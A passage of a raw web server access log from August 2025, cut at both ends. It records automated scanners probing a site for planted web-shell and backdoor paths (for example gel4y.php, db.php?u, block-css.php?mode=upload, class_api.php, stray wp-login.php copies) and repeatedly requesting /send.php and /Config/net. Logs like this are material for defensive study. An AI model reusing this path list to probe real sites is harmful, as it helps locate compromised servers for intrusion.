[12/Aug/2025:13:16:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:13:16:00 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:13:16:28 -0400] "GET /wp-content/themes/gaukingo/db.php?u HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:17:02 -0400] "GET /wp-content/themes/intense/block-css.php?mode=upload HTTP/1.1" 301 286 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 31.13.115.115 - - [12/Aug/2025:13:17:05 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:13:18:12 -0400] "GET /wp-content/plugins/seoplugins/db.php?u HTTP/1.1" 301 273 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:18:29 -0400] "GET /wp-content/themes/hideo/network.php HTTP/1.1" 301 270 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 216.73.216.186 - - [12/Aug/2025:13:20:13 -0400] "GET /.well-known/acme-challenge/VF375WB2J1HL_JHTTYKHYRE8U2V8WIH2 HTTP/1.1" 404 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" 152.42.157.60 - - [12/Aug/2025:13:20:46 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:13:20:47 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:13:20:47 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:13:20:47 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:13:22:22 -0400] "GET /ioxi002.PhP7 HTTP/1.1" 301 247 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:22:40 -0400] "GET /ynz.PhP7 HTTP/1.1" 301 243 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:22:58 -0400] "GET /themes.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:23:20 -0400] "GET /erin1.PhP7 HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:23:36 -0400] "GET /themes.php HTTP/1.1" 301 245 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:23:40 -0400] "GET /fosil.php HTTP/1.1" 301 244 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:23:58 -0400] "GET /ws.php.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:24:23 -0400] "GET /ws.php HTTP/1.1" 301 241 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:24:45 -0400] "GET /wp-admin/user/wp-login.php HTTP/1.1" 301 261 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:25:06 -0400] "GET /wp-includes/images/wp-login.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:25:29 -0400] "GET /.well-known/pki-validation/wp-login.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:25:49 -0400] "GET /wp-admin/wp-login.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:26:14 -0400] "GET /wp-includes/wp-login.php HTTP/1.1" 301 259 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:26:31 -0400] "GET /cgi-bin/wp-login.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:26:45 -0400] "GET /.wp-cli/wp-login.php HTTP/1.1" 301 255 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:27:07 -0400] "GET /wp-content/uploads/wp-login.php HTTP/1.1" 301 266 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 149.50.215.205 - - [12/Aug/2025:13:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:13:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:13:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:13:27:21 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:13:30:39 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:13:30:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:13:30:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:13:30:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 68.183.245.101 - - [12/Aug/2025:13:32:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:13:32:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:13:32:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:13:32:09 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 146.190.11.185 - - [12/Aug/2025:13:38:06 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:13:38:06 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:13:38:06 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:13:38:06 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:13:40:28 -0400] "GET /cgi-bin/class_api.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:42:18 -0400] "GET /wp-admin/images/class.api.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 149.50.215.205 - - [12/Aug/2025:13:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:13:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:13:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:13:42:31 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:13:43:41 -0400] "GET /wp-content/plugins/core-plugin/include.php HTTP/1.1" 301 277 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:44:22 -0400] "GET /wp-admin/js/widgets/class.api.php HTTP/1.1" 301 268 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 212.143.94.239 - - [12/Aug/2025:13:44:27 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" 31.186.39.146 - - [12/Aug/2025:13:46:40 -0400] "GET / HTTP/1.1" 301 231 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0" 68.183.245.101 - - [12/Aug/2025:13:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:13:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:13:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:13:46:59 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:13:48:28 -0400] "GET /.well-known/pki-validation/class_api.php HTTP/1.1" 404 - "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 66.220.149.114 - - [12/Aug/2025:13:48:56 -0400] "GET /teeth-implant HTTP/1.1" 301 244 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" 94.16.113.252 - - [12/Aug/2025:13:49:18 -0400] "GET /class_api.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 152.42.157.60 - - [12/Aug/2025:13:50:22 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.89.216.7 - - [12/Aug/2025:13:50:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 170.64.252.169 - - [12/Aug/2025:13:50:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 174.138.112.39 - - [12/Aug/2025:13:50:23 -0400] "GET /Config/net HTTP/1.1" 301 241 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:13:51:39 -0400] "GET /class.api.php HTTP/1.1" 301 248 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 18.222.251.173 - - [12/Aug/2025:13:54:45 -0400] "GET /wp-content/plugins/essential-addons-for-elementor-lite/readme.txt HTTP/1.1" 301 296 "www.google.com" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" 149.50.215.205 - - [12/Aug/2025:13:56:26 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 209.38.125.40 - - [12/Aug/2025:13:56:26 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 149.22.91.139 - - [12/Aug/2025:13:56:26 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 156.146.41.214 - - [12/Aug/2025:13:56:27 -0400] "GET /it/ HTTP/1.1" 301 234 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:13:57:24 -0400] "GET /wp-includes/images/include.php HTTP/1.1" 301 265 "www.google.com" "Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36" 94.16.113.252 - - [12/Aug/2025:13:58:05 -0400] "GET /wp-content/plugins/wp-daft/t62.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 86.8.204.43 - - [12/Aug/2025:14:02:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 68.183.245.101 - - [12/Aug/2025:14:02:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 206.189.247.132 - - [12/Aug/2025:14:02:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 144.126.240.247 - - [12/Aug/2025:14:02:20 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:14:02:28 -0400] "GET /inputs.php HTTP/1.1" 301 245 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:14:02:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:14:02:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:14:02:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:14:02:41 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 94.16.113.252 - - [12/Aug/2025:14:03:37 -0400] "GET /wp-includes/inputs.php HTTP/1.1" 301 257 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:04:47 -0400] "GET /wp-content/uploads/inputs.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:05:30 -0400] "GET /wp-content/plugins/wordpress-three/miin.php HTTP/1.1" 301 278 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:05:52 -0400] "GET /wp-content/plugins/inputs.php HTTP/1.1" 301 264 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 146.190.11.185 - - [12/Aug/2025:14:06:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:14:06:51 -0400] "GET /wp-admin/inputs.php HTTP/1.1" 301 254 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 206.189.247.132 - - [12/Aug/2025:14:06:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 164.90.241.135 - - [12/Aug/2025:14:06:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 159.203.144.167 - - [12/Aug/2025:14:06:51 -0400] "GET /Config HTTP/1.1" 301 237 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 94.16.113.252 - - [12/Aug/2025:14:07:33 -0400] "GET /images/inputs.php HTTP/1.1" 301 252 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:08:23 -0400] "GET /.well-known/acme-challenge/inputs.php HTTP/1.1" 301 272 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:09:11 -0400] "GET /wp-atom.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:09:24 -0400] "GET /wp-content/themes/inputs.php HTTP/1.1" 301 263 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:09:58 -0400] "GET /ticket/vendor/htmlawed/htmlawed/gel4y.php HTTP/1.1" 301 276 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:10:07 -0400] "GET /vendor/htmlawed/htmlawed/gel4y.php HTTP/1.1" 301 269 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:10:08 -0400] "GET /wp-content/inputs.php HTTP/1.1" 301 256 "-" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:14:10:17 -0400] "GET /glpi/vendor/network.php HTTP/1.1" 